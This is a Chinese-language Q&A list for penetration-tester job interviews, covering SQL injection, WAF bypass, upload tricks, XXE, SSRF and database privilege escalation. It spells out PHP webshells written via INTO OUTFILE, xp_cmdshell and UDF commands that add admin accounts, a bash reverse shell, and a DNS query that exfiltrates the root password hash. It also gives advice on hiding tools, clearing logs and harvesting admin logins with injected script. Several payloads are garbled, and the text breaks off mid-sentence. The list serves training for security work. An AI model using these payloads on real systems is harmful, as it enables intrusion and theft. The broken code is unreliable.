渗透测试工程师面试题总结(一)
目录
2.mysql 的网站注入,5.0 以上和 5.0 以下有什么区别?
7.mysql 注入点,用工具对目标站直接写入一句话,需要哪些条件?
9.如何手工快速判断目标站是 windows 还是 linux 服务器?
10.为何一个 mysql 数据库的站,只有一个 80 端口开放?
14.拿到一个 webshell 发现网站根目录下有.htaccess 文件,我们能做什么?
17.access 扫出后缀为 asp 的数据库文件,访问乱码。如何实现到本地利用?
19.某服务器有站点 A,B 为何在 A 的后台添加 test 用户,访问 B 的后台。发现也添加上了 test 用户?
20.注入时可以不使用 and 或 or 或 xor,直接 order by 开始注入吗?
24.目标站禁止注册用户,找回密码处随便输入用户名提示:“此用户不存在”,你觉得这里怎样利用?
25.目标站发现某 txt 的下载地址为 http://www.test.com/down/down.php?file=/upwdown/1.txt,你有什么思路?
26.甲给你一个目标站,并且告诉你根目录下存在/abc/目录,并且此目录下存在编辑器和 admin 目录。请问你的想法是?
27.在有 shell 的情况下,如何使用 xss 实现对目标站的长久控制?
28.后台修改管理员密码处,原密码显示为*。你觉得该怎样实现读出这个用户的密码?
29.目标站无防护,上传图片可以正常访问,上传脚本格式访问则 403.什么原因?
31.在 win2003 服务器中建立一个 .zhongzi 文件夹用意何为?
32.sql 注入有以下两个测试选项,选一个并且阐述不选另一个的理由?
33.以下链接存在 sql 注入漏洞,对于这个变形注入,你有什么思路?
34 发现 demo.jsp?uid=110 注入点,你有哪几种思路获取 webshell,哪种是优选?
35.CSRF 和 XSS 和 XXE 有什么区别,以及修复方式?
38 圈出下面会话中可能存在问题的项,并标注可能会存在的问题?
56.img 标签除了 onerror 属性外,还有其他获取管理员路径的办法吗?
57.img 标签除了 onerror 属性外,并且 src 属性的后缀名,必须以.jpg 结尾, 怎么获取管理员路径?
60.列举出 oracle 注入获取管理员权限提权典型漏洞?
62、mssql 提权提示错误代码 5,cmd 权限不足的原因?
63.怎么用 sqlmap 对 sa 权限的 mssql 2008 进行提权?
71.HTTP 协议 head 方法的功能与 get 方法不同之处是?
77.tcp、udp 的区别及 tcp 三次握手,syn 攻击?
1.拿到一个待检测的站,你觉得应该先做什么?
收集信息:whois、网站源 IP、旁站、C 段网站、服务器系统版本、容器版本、
程序版本、数据库类型、二级域名、防火墙、维护者信息另说...
2.mysql 的网站注入,5.0 以上和 5.0 以下有什么区别?
5.0 以下没有 information_schema 这个系统表,无法列表名等,只能暴力跑表名;5.0 以下是多用户单操作,5.0 以上是多用户多操做。
3.在渗透过程中,收集目标站注册人邮箱对我们有什么价值?
(1)丢社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后台
(2)用邮箱做关键词进行丢进搜索引擎
(3)利用搜索到的关联信息找出其他邮箱进而得到常用社交账号
(4)社工找出社交账号,里面或许会找出管理员设置密码的习惯
(5)利用已有信息生成专用字典
(6) 观察管理员常逛哪些非大众性网站,拿下它,你会得到更多好东西
4.判断出网站的 CMS 对渗透有什么意义?
查找网上已曝光的程序漏洞,如果开源,还能下载相对应的源码进行代码审计。
5.一个成熟并且相对安全的 CMS,渗透时扫目录的意义?
(1)敏感文件、二级目录扫描
(2)站长的误操作比如:网站备份的压缩文件、说明.txt、二级目录可能存放着其他站点
6.常见的网站服务器容器?
IIS、Apache、nginx、Tomcat,weblogic、jboss
7.mysql 注入点,用工具对目标站直接写入一句话,需要哪些条件?
root 权限以及网站的绝对路径
load_file()读取文件操作
前提:
知道文件的绝对路径
能够使用 union 查询
对 web 目录有写的权限
union select 1,load_file('/etc/passwd'),3,4,5#
0x2f6574632f706173737764
union select 1,load_file(0x2f6574632f706173737764),3,4,5#
路径没有加单引号的话必须转换十六进制
要是想省略单引号的话必须转换十六进制
into outfile 写入文件操作
前提:
文件名必须是全路径(绝对路径)
用户必须有写文件的权限
没有对单引号'过滤
select '<?php phpinfo(); ?>' into outfile 'C:\Windows\tmp\8.php'
select '<?php @eval($_POST["admin"]); ?>' into outfile
'C:\Windows\tmp\8.php'
路径里面两个反斜杠\可以换成一个正斜杠/
PHP 语句没有单引号的话,必须转换成十六进制
要是想省略单引号'的话,必须转换成十六进制
<?php eval($_POST["admin"]); ?> 或者 <?php
eval($_GET["admin"]); ?>
<?php @eval($_POST["admin"]); ?>
<?php phpinfo(); ?>
<?php eval($_POST["admin"]); ?>
建议一句话 PHP 语句转换成十六进制
8.目前已知哪些版本的容器有解析漏洞,具体举例?
(1) IIS 6.0
/xx.asp/xx.jpg "xx.asp"是文件夹名
(2) IIS 7.0/7.5
默认 Fast-CGI 开启,直接在 url 中图片地址后面输入/1.php,会把正常图片
当成 php 解析
(3) Nginx
版本小于等于 0.8.37,利用方法和 IIS 7.0/7.5 一样,Fast-CGI 关闭情况下也
可利用。
空字节代码 xxx.jpg.php
(4)Apache
上传的文件命名为:test.php.x1.x2.x3,Apache 是从右往左判断后缀
(6)lighttpd
xx.jpg/xx.php
9.如何手工快速判断目标站是 windows 还是 linux 服务器?
linux 大小写敏感,windows 大小写不敏感
10.为何一个 mysql 数据库的站,只有一个 80 端口开放?
(1)更改了端口,没有扫描出来
(2) 站库分离
(3) 3306 端口不对外开放
11.3389 无法连接的几种情况?
(1)没开放 3389 端口
(2)端口被修改
(3) 防护拦截
(4)处于内网(需进行端口转发)
12.如何突破注入时字符被转义?
宽字符注入;hex 编码绕过
13.在某后台新闻编辑界面看到编辑器,应该先做什么?
查看编辑器的名称版本,然后搜索公开的漏洞
14.拿到一个 webshell 发现网站根目录下有.htaccess 文件,我们能做什么?
能做的事情很多,用隐藏网马来举例子: 插入
<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php </FilesMatch>
.jpg 文件会被解析成.php 文件
15.注入漏洞只能查账号密码?
可脱裤,可上传 webshell,可执行命令
16.安全狗会追踪变量,从而发现出是一句话木马吗?
是根据特征码,所以很好绕过
17.access 扫出后缀为 asp 的数据库文件,访问乱码。如何实现到本地利用?
迅雷下载,直接改后缀为.mdb
18.提权时选择可读写目录,为何尽量不用带空格的目录?
因为 exp 执行多半需要空格界定参数
19.某服务器有站点 A,B 为何在 A 的后台添加 test 用户,访问 B 的后台。发现也添加上了 test 用户?
同数据库
20.注入时可以不使用 and 或 or 或 xor,直接 order by 开始注入吗?
and/or/xor,前面的 1=1、1=2 步骤只是为了判断是否为注入点,如果已经
确定是注入点那就可以省那步骤去
21:某个防注入系统,在注入时会提示:统检测到你有非法注入的行为。已记录 您的 ip xx.xx.xx.xx 时间:2016:01-23 提交页面:test.asp?id=15 提交内容:and 1=1 如何利用这个防注入系统拿 shell?
在 URL 里面直接提交一句话,这样网站就把你的一句话也记录进数据库文件了,这个时候可以尝试寻找网站的配置文件 直接上菜刀链接。具体文章参见:http://ytxiao.lofter.com/post/40583a_ab36540
22.上传大马后访问乱码时,有哪些解决办法?
浏览器中改编码
23.审查上传点的元素有什么意义?
有些站点的上传文件类型的限制是在前端实现的,这时只要增加上传类型就
能突破限制了
24.目标站禁止注册用户,找回密码处随便输入用户名提示:“此用户不存在”,你觉得这里怎样利用?
先爆破用户名,再利用被爆破出来的用户名爆破密码。
25.目标站发现某 txt 的下载地址为 http://www.test.com/down/down.php?file=/upwdown/1.txt,你有什么思路?
这就任意文件下载漏洞,在 file=后面尝试输入 index.php 下载他的首页文件,
然后在首页文件里继续查找其他网站的配置文件,可以找出网站的数据库密码和
数据库的地址。
26.甲给你一个目标站,并且告诉你根目录下存在/abc/目录,并且此目录下存在编辑器和 admin 目录。请问你的想法是?
直接在网站二级目录/abc/下扫描敏感文件及目录
27.在有 shell 的情况下,如何使用 xss 实现对目标站的长久控制?
(1)后台登录处加一段记录登录账号密码的 js,并且判断是否登录成功,如果登录成功,就把账号密码记录到一个生僻的路径的文件中或者直接发到自己的网站文件中。(此方法适合有价值并且需要深入控制权限的网络)
(2)在登录后才可以访问的文件中插入 XSS 脚本
28.后台修改管理员密码处,原密码显示为*。你觉得该怎样实现读出这个用户的密码?
审查元素 把密码处的 password 属性改成 text 就明文显示了
29.目标站无防护,上传图片可以正常访问,上传脚本格式访问则 403.什么原因?
原因很多,有可能 web 服务器配置把上传目录写死了不执行相应脚本,尝试
改后缀名绕过
30.审查元素得知网站所使用的防护软件,你觉得怎样做到的?
在敏感操作被拦截,通过界面信息无法具体判断是什么防护的时候,F12 看
HTML 体部 比如护卫神就可以在名称那看到<hws>内容<hws>
31.在 win2003 服务器中建立一个 .zhongzi 文件夹用意何为?
隐藏文件夹,为了不让管理员发现你传上去的工具
32.sql 注入有以下两个测试选项,选一个并且阐述不选另一个的理由?
A. demo.jsp?id=2+1 B. demo.jsp?id=2-1
选 B,在 URL 编码中 + 代表空格,可能会造成混淆
33.以下链接存在 sql 注入漏洞,对于这个变形注入,你有什么思路?
demo.do?DATA=AjAxNg==
DATA 有可能经过了 base64 编码再传入服务器,所以我们也要对参数进行
base64 编码才能正确完成测试
34 发现 demo.jsp?uid=110 注入点,你有哪几种思路获取 webshell,哪种是优选?
(1)有写入权限的,构造联合查询语句使用 using INTO OUTFILE,可以将查询的输出重定向到系统的文件中,这样去写入 WebShell
(2)使用 sqlmap –os-shell 原理和上面一种相同,来直接获得一个 Shell,这样效率更高
(3)通过构造联合查询语句得到网站管理员的账户和密码,然后扫后台登录后台,再在后台通过改包上传等方法上传 Shell
35.CSRF 和 XSS 和 XXE 有什么区别,以及修复方式?
(1)XSS 是跨站脚本攻击,用户提交的数据中可以构造代码来执行,从而实现窃取用户信息等攻击。
修复方式:对字符实体进行转义、使用 HTTP Only 来禁止 JavaScript 读取Cookie 值、输入时校验、浏览器与 Web 应用端采用相同的字符编码。
(2)CSRF 是跨站请求伪造攻击,XSS 是实现 CSRF 的诸多手段中的一种,是由于没有在关键操作执行时进行是否由用户自愿发起的确认。
修复方式:筛选出需要防范 CSRF 的页面然后嵌入 Token、再次输入密码、检验 Referer
(3)XXE 是 XML 外部实体注入攻击,XML 中可以通过调用实体来请求本地或者远程内容,和远程文件保护类似,会引发相关安全问题,例如敏感文件读取。修复方式:XML 解析库在调用时严格禁止对外部实体的解析。
36.CSRF、SSRF 和重放攻击有什么区别?
(1)CSRF 是跨站请求伪造攻击,由客户端发起
(2)SSRF 是服务器端请求伪造,由服务器发起
(3)重放攻击是将截获的数据包进行重放,达到身份认证等目的
37.说出至少三种业务逻辑漏洞,以及修复方式?
(1)密码找回漏洞中存在密码允许暴力破解、存在通用型找回凭证、可以跳过验
证步骤、找回凭证可以拦包获取等方式来通过厂商提供的密码找回功能来得到密
码
(2)身份认证漏洞中最常见的是会话固定攻击和 Cookie 仿冒,只要得到
Session 或 Cookie 即可伪造用户身份
(3)验证码漏洞中存在验证码允许暴力破解、验证码可以通过 Javascript 或者改
包的方法来进行绕过
38 圈出下面会话中可能存在问题的项,并标注可能会存在的问题?
GET /ecskins/demo.jsp?uid=2016031900&keyword=”hello world!”
HTTP/1.1
Host: ***com:82
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0)
Gecko/20100101 Firefox/45.0
Accept: text/css,/;q=0.1
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://*******com:82/eciop/orderForCC/cgtListForCC.htm?zone
=11370601&v=1459663591817
Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;
uniqueuserid=session_0GRMiFiYJhAh5_HZrQoZamJ;
st_uid=N90pIYHLZgjXI-NX01vPUf46w952J-0NcX19vgj1L%3DJXrZP9sf0I
Y-vEI9iNIX150iLXKat1YZLnUf46Z%2C5aec5biM5rCROueDn%2BWPsOeD
n%2BiNiTrng5%2Flj7A%3D; status=True
Connection: keep-alive
(标红 1:sql 注入,标红 2:xss,标红 3:cookies 欺骗,4:会话 CSRF 或重
放风险。)考对 HTTP 数据包字段敏感度及会话渗透经验。
39.找一类你最擅长的漏洞,谈下绕过漏洞修复后的方案?
40.你常用的渗透工具有哪些,最常用的是哪个?
burpsuit,appscan,avwvs,sqlmap,fiddler 等
41.描述一个你深入研究过的 CVE 或 POC?
如 cve-2017-11191 offcie 的 dde 漏洞
42.谈谈你经常关注的安全平台?
如,tools.net,90sec,先知社区,安全客,freebuf 等
43.给你一个网站你是如何来渗透测试的?
在获取书面授权的前提下:
(1)信息收集,
1.获取域名的 whois 信息,获取注册者邮箱姓名电话等。
2.查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁
站有没有通用性的 cms 或者其他漏洞。
3.查看服务器操作系统版本,web 中间件,看看是否存在已知的漏洞,比
如 IIS,APACHE,NGINX 的解析漏洞
4.查看 IP,进行 IP 地址端口扫描,对响应的端口进行漏洞探测,比如 rsync,
心脏出血,mysql,ftp,ssh 弱口令等。
5.扫描网站目录结构,看看是否可以遍历目录,或者敏感文件泄漏,比如
php 探针
6.google hack 进一步探测网站的信息,后台,敏感文件
(2)漏洞扫描
开始检测漏洞,如 XSS,XSRF,sql 注入,代码执行,命令执行,越权访问,
目录读取,任意文件读取,下载,文件包含, 远程命令执行,弱口令,上传,
编辑器漏洞,暴力破解等
(3)漏洞利用
利用以上的方式拿到 webshell,或者其他权限
(4)权限提升
提权服务器,比如 windows 下 mysql 的 udf 提权,serv-u 提权,windows
低版本的漏洞,如 iis6,pr,巴西烤肉,linux 脏牛漏洞,linux 内核版本漏洞提权,
linux 下的 mysql system 提权以及 oracle 低权限提权
(5)日志清理
(6)总结报告及修复方案
或者:
1)信息收集
a. 服务器的相关信息(真实 ip,系统类型,版本,开放端口,WAF 等)
b. 网站指纹识别(包括,cms,cdn,证书等),dns 记录
c. whois 信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等)
d. 子域名收集,旁站查询(有授权可渗透),C 段等
e. google hacking 针对化搜索,pdf 文件,中间件版本,弱口令扫描等
f. 扫描网站目录结构,爆后台,网站 banner,测试文件,备份等敏感文件泄漏
等
i. 传输协议,通用漏洞,exp,github 源码等
2)漏洞挖掘
1> 浏览网站,看看网站规模,功能,特点等
2> 端口,弱口令,目录等扫描
3> XSS,SQL 注入,命令注入,CSRF,cookie 安全检测,敏感信息,通信数
据传输,暴力破解,任意文件上传,越权访问,未授权访问,目录遍历,文件 包
含,重放攻击(短信轰炸),服务器漏洞检测,最后使用漏扫工具等
3)漏洞利用 | 权限提升
a) mysql 提权,serv-u 提权,linux 内核版本提权等
4)清除测试数据 | 输出报告
i 日志、测试数据的清理
ii 总结,输出渗透测试报告,附修复方案
5) 复测
验证并发现是否有新漏洞,输出报告,归档
44.sqlmap,怎么对一个注入点注入?
(1)如果是 get 型号,直接,sqlmap -u "诸如点网址".
(2)如果是 post 型诸如点,可以 sqlmap -u "注入点网址” --data="post
的参数"
(3)如果是 cookie,X-Forwarded-For 等,可以访问的时候,用 burpsuite
抓包,注入处用*号替换,放到文件里,然后 sqlmap -r "文件地址"
45.nmap,扫描的几种方式?
46.sql 注入的几种类型?
(1)报错注入
(2)bool 型注入
(3)延时注入
(4)宽字节注入
47.报错注入的函数有哪些?
(1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】
----------------
(2)通过 floor 报错 向下取整
(3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4)geometrycollection()select from test where id=1 and
geometrycollection((select from(selectfrom(select user())a)b));
(5)multipoint()select from test where id=1 and
multipoint((select from(select from(select user())a)b));
(5)polygon()select from test where id=1 and
polygon((select from(select from(select user())a)b));
(7)multipolygon()select from test where id=1 and
multipolygon((select from(select from(select user())a)b));
(8)linestring()select from test where id=1 and
linestring((select from(select from(select user())a)b));
(9)multilinestring()select from test where id=1 and
multilinestring((select from(select from(select user())a)b));
(10)exp()select from test where id=1 and exp(~(select * from(select
user())a));
addslashes() 函数返回在预定义字符之前添加反斜杠的字符串
48.延时注入如何来判断?
(1)if(ascii(substr(“hello”, 1, 1))=104
(2) sleep(5), 1)
49.盲注和延时注入的共同点?
都是一个字符一个字符的判断
50.如何拿一个网站的 webshell?
上传,后台编辑模板,sql 注入写文件,命令执行,代码执行,一些已经爆出
的 cms 漏洞,比如 dedecms 后台可以直接建立脚本文件,wordpress 上传插
件包含脚本文件 zip 压缩包等
51.sql 注入写文件都有哪些函数?
(1)select '一句话' into outfile '路径'
(2)select '一句话' into dumpfile '路径'
(3) select '<?php eval($_POST[1]) ?>' into
dumpfile 'd:\wwwroot\baidu.com\nvhack.php';
52.如何防止 CSRF?
(1)验证 referer
(2)验证 token
详细:http://cnodejs.org/topic/5533dd6e9138f09b629674fd
53.owasp 漏洞都有哪些?
(1)SQL 注入防护方法:
(2)失效的身份认证和会话管理
(3)跨站脚本攻击 XSS
(4)直接引用不安全的对象
(5)安全配置错误
(6)敏感信息泄露
(7)缺少功能级的访问控制
(8)跨站请求伪造 CSRF
(9)使用含有已知漏洞的组件
(1))未验证的重定向和转发
54.SQL 注入防护方法?
(1)使用安全的 API
(2)对输入的特殊字符进行 Escape 转义处理
(3)使用白名单来规范化输入验证方法
(4)对客户端输入进行控制,不允许输入 SQL 注入相关的特殊字符
(5)服务器端在提交数据库进行 SQL 查询之前,对特殊字符进行过滤、转义、
替换、删除。
55.代码执行,文件读取,命令执行的函数都有哪些?
(1)代码执行:
eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_fu
nction
(2)文件读取:file_get_contents(),highlight_file(),fopen(),read
file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等
(3)命令执行:system(), exec(), shell_exec(), passthru() ,pcntl_exec(),
popen(),proc_open()
56.img 标签除了 onerror 属性外,还有其他获取管理员路径的办法吗?
src 指定一个远程的脚本文件,获取 referer
57.img 标签除了 onerror 属性外,并且 src 属性的后缀名,必须以.jpg 结尾, 怎么获取管理员路径?
1,远程服务器修改 apache 配置文件,配置.jpg 文件以 php 方式来解析
AddType application/x-httpd-php .jpg
<img src=http://xss.tv/1.jpg> 会以 php 方式来解析
58.怎么绕过 WAF 注入和上传以及 xss?
(1)关键字可以用%(只限 IIS 系列),比如 select 可以 sel%e%ct。原理:网络层 waf 对 SEL%E%CT 进行 url 解码后变成 SEL%E%CT,匹配 select 失败,而进入 asp.dll 对 SEL%E%CT 进行 url 解码却变成 select。IIS 下的 asp.dll 文件在对 asp 文件后参数串进行 url 解码时,会直接过滤掉 09-0d(09 是 tab 键,0d是回车)、20(空格)、%(后两个字符有一个不是十六进制)字符。xss 也是同理。
(2)内联注释。安全狗不拦截,但是安全宝、加速乐、D 盾等,看到/!/就 Fack 了,所以只限于安全狗。比如:/!select*/
(3)编码。这个方法对 waf 很有效果,因为一般 waf 会解码,但是我们利用这个特点,进行两次编码,他解了第一次但不会解第二次,就 bypass 了。腾讯waf、百度 waf 等等都可以这样 bypass 的
(4)绕过策略如:伪造搜索引擎
早些版本的安全狗是有这个漏洞的,就是把 User-Agent 修改为搜索引擎
(5)插入关键目录 admin,dede,install 等目录绕过 360webscan
360webscan脚本存在这个问题,就是判断是否为admin dede install 等目录,
如果是则不做拦截
GET /pen/news.php?id=1 union select user,password from mysql.user
GET /pen/news.php/admin?id=1 union select user,password from
mysql.user
GET /pen/admin/..\news.php?id=1 union select user,password from
mysql.user
(6)multipart 请求绕过,在 POST 请求中添加一个上传文件,绕过了绝大多数
WAF。
(7)参数绕过,复制参数,id=1&id=1 用一些特殊字符代替空格,比如在 mysql 中%0a 是换行,可以代替空格,这个 方法也可以部分绕过最新版本的安全狗,在 sqlserver 中可以用/**/代替空格
(8)内联注释,
文件上传,复制文件包一份再加一份
在 form-data;后面增加一定的字符
59.既然宽字节注入可以绕过单引号过滤,那么怎么来修复呢?
宽字符:解 决方法:就是在初始化连接和字符集之后,使用 SET character_set_client=binary 来设定客户端的字符集是二进制的。修改 Windows 下的 MySQL 配置文件一般是 my.ini,Linux 下的 MySQL 配置文件 一般是 my.cnf,比如:mysql_query("SETcharacter_set_client=binary");。 character_set_client 指定的是 SQL 语句的编码,如果设置为 binary,MySQL 就以二进制来执行,这样宽字节编码问题就没有用武之地了。
详细参考:
http://wenku.baidu.com/link?url=F4Cq18NYdsnATq3eqtr3zCWLKExoEY
V62yJp5zsfM5c85iv4rldTvl1A_SGilEAiWB_O_hg0C9A8VLoIT4K_HxyyF0Z7
xo5Pihh1VxxYa4QGiXQ_wGDjiOFHubYvshgl
60.列举出 oracle 注入获取管理员权限提权典型漏洞?
【漏洞名称】 sys.dbms_export_extension.get_domain_index_metadata 提
升权限漏洞
【影响平台】Oracle 8i / 9i / 10g / XE
【风险等级】高【攻击需求】较低权限账号
【造成危害】取得管理员权限
61.mssql 提权的提权思路有哪些步骤?
(1)首先看看 xp_cmdshel 是否 l 存在,不存在的话先恢复,恢复语句如下:
Exec sp_configure show advanced options,1;RECONFIGURE;EXEC sp_configure xp_cmdshell,1;RECONFIGURE; ;EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell, 1;RECONFIGURE;--
(2)如果 xp_cmdshell 还是不行就再执行命令
;dbcc addextendedproc("xp_cmdshell","xplog70.dll");-- 或;sp_addextendedproc xp_cmdshell,@dllname=xplog70.dll 来恢复 cmdshell
(3)无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指
定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc xp_cmdshell
第二步执行:exec sp_addextendedproc xp_cmdshell,xpweb70.dll
然后按 F5 键命令执行完毕
(4)终极方法
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser 系统:
declare @shell int exec sp_oacreate wscript.shell,@shell output exec
sp_oamethod @shell,run,null,c:winntsystem32cmd.exe /c net user dell
huxifeng007 /add
declare @shell int exec sp_oacreate wscript.shell,@shell output exec
sp_oamethod @shell,run,null,c:winntsystem32cmd.exe /c net localgroup
administrators dell /add
sql2008 提权 低权限运行
62、mssql 提权提示错误代码 5,cmd 权限不足的原因?
错误代码”5″,马上 google 之。由于 xp_cmdshell 是严格 用%systemroot%\system32\cmd.exe 去执行所提交的命令的,提示”5″,意 思是 cmd 的权限不足,就是说 system32 下的 cmd.exe 被降权了。当然也有绕 过的方法,比如启用沙盒模式执行 shell 命令:
63.怎么用 sqlmap 对 sa 权限的 mssql 2008 进行提权?
(1)第一种函数
select name from sysobjects where xtype=u 通过这个来爆第一个表
select name from sysobjects where xtype=u and name not in(爆出来的表
1,爆出来的表 2...)
一直爆下去,直到找到我们所需要的表位置
(2)第二种函数
select table_name from information_schema.tables
select table_name from information_schema.tables where table_name
not in (爆出来的表 1,爆出来的表 2...)
参考文章:http://www.freebuf.com/articles/web/10280.html
64.xxe 注入有哪些危害以及防御 ?
91)引用外部实体<!ENTITY 实体名称 SYSTEM "URI">或者 <!ENTITY 实体
名称 PUBLIC "public_ID" "URI">
当允许引用外部实体时,通过构造恶意内容
(2)可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 对于不同 XML 解析器,对外部实体有不同处理规则,在 PHP 中默认处理的函数为: xml_parse 和 simplexml_load xml_parse 的实现方式为 expat 库,默认情况不会解析外部实体,而 simplexml_load 默认情况下会解析外部实体,造成安全威胁. 除 PHP 外,在 Java,Python 等处理 xml 的组件及函数中都可能存在此问题
https://www.waitalone.cn/xxe-attack.html
XXE 漏洞 http://www.91ri.org/9539.html
<!DOCTYPE filename
[<!ENTITY entity-name "entity-content" ]>
(3)防御:
方案一、使用开发语言提供的禁用外部实体的方法 libxml_disable_entity_loader(true);
方案二、过滤用户提交的 XML 数据
1.检查所使用的底层 xml 解析库,默认禁止外部实体的解析
2.使用第三方应用代码及时升级补丁
3.同时增强对系统的监控,防止此问题被人利用
对于 PHP,由于 simplexml_load_string 函数的 XML 解析问题出在 libxml 库上, 所以加载实体前可以调用这样一个函数
65.gpc 魔术引号?
参考文章: http://www.jb51.net/article/38990
66.MYSQL 有哪些提权方法?
(1)UDF 提权
这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:
create function cmdshell returns string soname ’udf.dll’
select cmdshell(’net user iis_user 123!@#abcABC /add’);
select cmdshell(’net localgroup administrators iis_user /add’);
select cmdshell(’regedit /s d:web3389.reg’);
drop function cmdshell;
select cmdshell(’netstat -an’);(2)VBS 启动项提权
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user
123!@#abcABC/add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup
administrators iis_user /add"",0) " );
select * from a into outfile "C:\Documents and Settings\All Users\「开始」
菜单\程序\启动\a.vbs";
(3)Linx MySQL BackDoor 提权
Linx Mysql Door
Mysql BackDoor 是一款针对 PHP+Mysql 服务器开发的后门,该后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随Mysql进程启动一个基于 Dll 的嗅探型后门,这个后门在 Windows 下拥有与 Mysql 一样的系统权限,从而巧妙的实现了无端口,无进程,无服务的穿墙木马. 用法:将 Mysql.php 传到 PHP 服务器上,点击"自动安装 Mysql BackDoor",然后直接执行命令即可
(4)MIX.DLL 提权
1.在独立 IP 的 sqlmap 下运
2.禁用本地缓存 net stop dns
3.http://localhost/inject.php?user=123' and if((SELECT LOAD_FILE(CONCAT('\\',(SELECT
hex(user())),'.abc.com\foobar'))),1,1)%23 http://localhost/inject.php?user=123' and if((SELECT
LOADFILE(CONCAT('\\',(SELECT concat(user,'',mid(password,2,41)) from user where user='root' limit 1),'.md5crack.cn\foobar'))),1,1)%23
https://sanwen8.cn/p/1acWt8J.html
4.DNS 突破
参考文章:http://www.freebuf.com/vuls/85021.html
67.什么叫 ssrf 以及 ssrf 的防御?
(1)SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF 攻击的目标是从外网无法访问的内部系统
(2)SSRF 统一错误信息,避免用户可以根据错误信息来判断远程服务器端口状态
1.限制请求的端口为 HTTP 常用的端口,比如 80,443,8080,8088 等
2.黑名单内网 IP。
3.禁用不需要的协议,仅仅允许 HTTP 和 HTTPS.
68.如何利用 php 的远程命令执行函数进行反弹 nc?
system,exec,shell_exec,paassthru,popen,proc_popen, 反弹 shell 公网服务器执行 nc –lvv 8888 目标服务器上执行?cmd= bash -i >& /dev/tcp/10.0.0.1/8888 0>&1 并在 disabl_functions 中禁用
69.文件包含漏洞可以用来做啥,以及需要主要注意的事项?
(1)配合文件上传漏洞 GetShell,可以执行任意脚本代码,网站源码文件以及
配置文件泄露,远程包含 GetShel, 控制整个网站甚至是服务器
(2)allow_url_fopen 和 allow_url_include 为 ON 的话,则包含的文件可以是
第三方服务器中的文件,这样就形成了远程文件包含漏洞
(3)/etc/passwd • 需要 magic_quotes_gpc=off,PHP 小于 5.3.4 有效
(4)/etc/passwd././././././././././././.[......]/././././././././.
(5)php 版本小于 5.2.8 可以成功,linux 需要文件名长于 4096,windows
需要长于 256
index.php?page=php://filter/read/=convert.base64-encode/resource=i
ndex.php
70.文件上传有哪些技巧?
通过抓包截断将 eval.php.jpg 换成 eval.php_jpg(下划线为 0x00)。在上传文件时系统文件遇到 0x00。会认为文件已经结束。从而将 eval.php.jpg 的内容写入到 eval.php 中。
.htaccess 文件内容
<FilesMatch “haha”>
SetHandler application/x-httpd-php
</FileMatch>
文件幻数检测 jpg(JFIF) gif(GIF89a) png(%PNG)
apache 解析漏洞,2.0-2.2 IIS7.5 解析漏洞,任意文件名后加.php
nginx<0.8.32 1.jpg/1.php
nginx>0.8.41<1.5.6,1.jpg%20.php 解析
SQL 注入(Sql Injection )是一种将 SQL 语句插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的 SQL 服务器加以解析并执行。
71.HTTP 协议 head 方法的功能与 get 方法不同之处是?
不同之处在于服务器不会在其相应中返回消息主体。
• TRACE。这种方法主要用于诊断。
• OPTIONS。这种方法要求服务器报告对某一特殊资源有效的 HTTP 方法。
• PUT。这个方法试图使用包含在请求主体中的内容,向服务器上传制定的资源
** 各种注释#-- -- - --+ // /**/ 空白字符,+号,-号,~号,!号,@形式
{} %0a-----------------------------
72.域和组的区别是什么?
工作组是一群计算机的集合,它仅仅是一个逻辑的集合,各自计算机还是各自管
理的,你要访问其中的计算机,还是要到被访问计算机上来实现用户验证的。而
域不同,域是一个有安全边界的计算机集合,在同一个域中的计算机彼此之间已
经建立了信任关系,在域内访问其他机器,不再需要被访问机器的许可了。为什
么是这样的呢?因为在加入域的时候,管理员为每个计算机在域中(可和用户不
在同一域中)建立了一个计算机帐户,这个帐户和用户帐户一样,也有密码保护
的。可是大家要问了,我没有输入过什么密码啊,是的,你确实没有输入,计算
机帐户的密码不叫密码,在域中称为登录凭据,它是由 2000 的 DC(域控制器)
上的 KDC 服务来颁发和维护的。为了保证系统的安全,KDC 服务每 30 天会自
动更新一次所有的凭据,并把上次使用的凭据记录下来。周而复始。也就是说服
务器始终保存着 2 个凭据,其有效时间是 60 天,60 天后,上次使用的凭据就
会被系统丢弃。如果你的 GHOST 备份里带有的凭据是 60 天的,那么该计算机
将不能被 KDC 服务验证,从而系统将禁止在这个计算机上的任何访问请求(包
括登录),解决的方法呢,简单的方法使将计算机脱离域并重新加入,KDC 服
务会重新设置这一凭据。或者使用 2000 资源包里的 NETDOM 命令强制重新设
置安全凭据。因此在有域的环境下,请尽量不要在计算机加入域后使用 GHOST
备份系统分区,如果作了,请在恢复时确认备份是在 60 天内作的,如果超出,
就最好联系你的系统管理员,你可以需要管理员重新设置计算机安全凭据,否则
你将不能登录域环境。
域和工作组适用的环境不同,域一般是用在比较大的网络里,工作组则较小,在
一个域中需要一台类似服务器的计算机,叫域控服务器,其他电脑如果想互相访
问首先都是经过它的,但是工作组则不同,在一个工作组里的所有计算机都是对
等的,也就是没有服务器和客户机之分的,但是和域一样,如果一台计算机想访
